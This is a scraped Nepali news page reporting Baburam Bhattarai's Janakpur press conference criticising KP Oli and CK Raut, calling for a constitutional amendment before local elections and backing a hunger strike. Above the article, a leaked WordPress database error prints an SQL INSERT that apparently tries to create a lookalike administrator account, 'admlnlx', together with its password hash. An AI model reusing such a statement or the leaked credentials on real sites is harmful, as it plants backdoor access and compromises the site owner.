WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B291xBWoTPD9YW1C6lNZMZBKwB1TNS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 19:56:22', '', 'admlnlx', 'admlnlx')
जनकपुर, फागुन १ –
नयाँ शक्ति नेपाल पार्टीका अध्यक्ष डा. बाबुराम भटटराईले केपी शर्मा ओली र सिके राउत दुबै एउटै सिक्काका दुई पाटा भएको टिप्पणी गरेका छन् । दुवैको कारणले गर्दा मुलुकमा अतिवादी चिन्तन हावी भएको उनले बताए ।
जनकपुरमा आयोजित पत्रकार सम्मेलनमा पूर्वप्रधानमन्त्री भटटराईले मधेसमा देखिएको असन्तुष्टिलाई सम्बोधन नगरिएकै कारण मधेसमा सीके राउत प्रवृति हावी भएको बताए । र, सिके राउत प्रवृत्तिलाई नेकपा एमाले अध्यक्ष केपी ओलीले मलजल गरिरहेको भट्टराईको आरोप छ ।नयाँ शक्तिका नेता भटटराईले संविधान संशोधन गरेर मात्रै स्थानीय चुनावमा जानु उत्तम विकल्प भएको बताए । संविधान संशोधन र संघीयताको कार्यान्वयन भएको अवस्थामा मात्रै मुलुकले निकास पाउने उनको धारणा छ ।
अहिलेकै अवस्थामा स्थानिय चुनाव गरे मुलुकमा झनै जटिलता थपिने भट्टराईले बताए ।भट्टराईले नयाँ शक्तिका नेताहरुले जनकपुर विकासको लागि थालेको आमरणमा समर्थन जनाएका छन् । उनले अनसनकारीको माग तत्काल सम्बोधान गर्न समेत सरकारसँग माग गरेका छन् ।